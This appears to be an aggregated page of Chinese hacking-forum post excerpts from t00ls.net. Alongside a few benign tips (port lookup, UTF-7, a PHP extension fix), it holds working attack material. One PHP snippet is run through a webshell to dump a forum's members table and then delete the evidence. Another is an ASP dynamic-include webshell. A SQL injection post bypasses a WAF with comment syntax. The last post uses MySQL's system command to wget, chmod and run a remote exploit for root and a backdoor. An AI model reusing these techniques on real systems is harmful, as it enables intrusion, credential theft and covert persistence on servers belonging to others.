author:my5t3ry
转载请注明:t00ls.net
漏洞位于注册页面的\User\Reg\RegAjax.asp 中的24 – 46行 和 254 -270 行 代码如下:
Class Ajax_Check
Private KS
Private Sub Class_Initialize()
Set KS=New PublicCls
End Sub
Private Sub Class_Terminate()
Set KS=Nothing
End Sub
Public Sub Kesion()
Select Case KS.S(“Action”)
Case “checkusername”
Call CheckUserName()
Case “checkemail”
Call CheckEmail()
Case “checkcode”
Call CheckCode()
Case “getregform”
Call GetRegForm()
Case “getcityoption”
Call getCityOption()
End Select
End Sub
……略去无关代码 阅读全文…
author:toby57
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
这儿利用的是马儿的专家模式(自己写代码)。
ini_set(‘display_errors’, 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(“:/var/tmp/mysql.sock”, “forum”, “xx!!xx3″) or die(“Could not connect: ” . mysql_error());
mysql_select_db(“discuz”,$connx) or die(“Could not connect: ” . mysql_error());
$result = mysql_query(“Select * FROM members”,$connx) or die(“Could not connect: ” . mysql_error());
$i = 0;
$tmp = ”;
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
$i = $i+1;
$tmp .= implode(“::”, $row).”\n”;
if(!($i%500)){//500条写入一个文件
$filename = ‘/home/httpd/bbs.xxxxx/forumdata/cache/user’.intval($i/500).’.txt’;
file_put_contents($filename,$tmp);
$tmp = ”;
}
}
mysql_free_result($result);
//down完后delete
ini_set(‘display_errors’, 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
$i = $i+1;
$filename = ‘/home/httpd/bbs.xxxx/forumdata/cache/user’.$i.’.txt’;
unlink($filename);
}
author: bin
<%
Server.execute(request(“file”))
%>
与include的区别,它可以动态包含文件。
被包含文件里面可执行ASP代码,在国外的源码中有使用的。
include.asp?file=./1.txt
1.txt
<%response.write(now())%>
这种方法不算新,可是很少人用,也很少人能想得到。
http://hi.baidu.com/cncxz/blog/item/8d6aaa08d1d96fbc2fddd4ee.html
data:类似于javascript:,在很大程度上,可以完成javascript的工作.
举一个例子:
进行XSS测试时,发现javascript与script等关键字都被过滤了(现在一般有点XSS意识的管理员都懂得过滤这两个关键字)。可用下面的语句:
阅读全文…
author:cnbird
经常我们在启动应用的时候发现系统需要的端口被别的程序占用,如何知道谁占有了我们需要的端口,很多人都比较头疼,下面就介绍一种非常简单的方法,希望对大家有用假如我们需要确定谁占用了我们的9050端口
1、Windows平台
在windows命令行窗口下执行:
C:\>netstat -aon|findstr “9050″ TCP 127.0.0.1:9050
0.0.0.0:0 LISTENING 2016
看到了吗,端口被进程号为2016的进程占用,继续执行下面命令:
C:\>tasklist|findstr “2016″
tor.exe 2016 Console 0 16,064 K
很清楚吧,tor占用了你的端口
作者:[肖允锋]
MIME(Multipurpose Internet Mail Extensions) 中没有将 Unicode 定义为一种许可的字符集,也没有规定其如何编码。虽然已有其他的一些编码格式(如:UTF-8)应用于邮件当中,但它们使用了128到255之间的数值去表示 Unicode 字符,这对于非 US-ASCII 的字符集的编解码是不利的。
因为很多邮件网关和系统无法正确地提交八位的 US-ASCII 码,这样使用扩展的 US-ASCII 的字符将出现丢失位(bit)的情况。由于 UTF-7 只使用 7 位(bit),最高位不使用,因此 UTF-7 编码能够完整的在这些系统中进行传输。
对于部分US-ASCII 字符和 US-ASCII 以外的字符,UTF-7 采用变字节顺序的方法进行解码,并使用 US-ASCII 中的保留字符作为转换字符(shift character)。以下是 UTF-7 编码和解码规则的说明。
阅读全文…
当php的服务器端缺少libmcrypt.dll,使用函数mcrypt_module_open会出现此错误。
在服务器上做如下设置可解决。
下载一个libmcrypt.dll文件
1.将libmcrypt.dll复制到php安装目录下的ext目录下
2.到打开php.ini文件,打开它
3.找到; Directory in which the loadable extensions (modules) reside.
extension_dir = “./”
这两行,要使extension_dir指向的目录下能找到libmcrypt.dll(一般指向php安装目录下的ext目录就OK了)
5.找到;Windows Extensions 项下面的;extension=php_mcrypt.dll这一行,去掉前面的分号注释
文/meao
昨天在检测一个外国PHP网站时
在id=255后加’出现forbidden
于是我and 1=1正常 and 1=2出错
说明肯定有注入
接着我order by猜出字段
然后union select 1,2,3,4 //悲剧的又出现了forbidden
肯定是做了过滤了
后来构造了语句id=-255+union+/*!select*/+1,2,3,4 阅读全文…
文/xuser
一般注入多用于在mssql和mysql两类数据库中,如mssql+asp、 mysql+php则是最为常见的搭配环境。不同的网站应用的数据库也大不一样,根据数据库的处理能力、负载等多重因素决定。诸如mssql与mysql 各类注入问题在网上已是随处可见,本文主要述说下关于少见的一类数据库注入:PostgreSQL。
关于PostgreSQL
PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),可以说是目前世界上最先进,功能最强大的自由数据库管理系统。 阅读全文…
mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。
一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般。今天我们换一种方式。
按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,好比,下载exp执行, 搞到 root权限,然后装后门。
mysql>system vi /etc/httpd/conf/httpd.conf;
mysql>system wget http://www.xxx.com/xxxx ;
mysql>system chmod +x xxxx; mysql>system ./xxxx;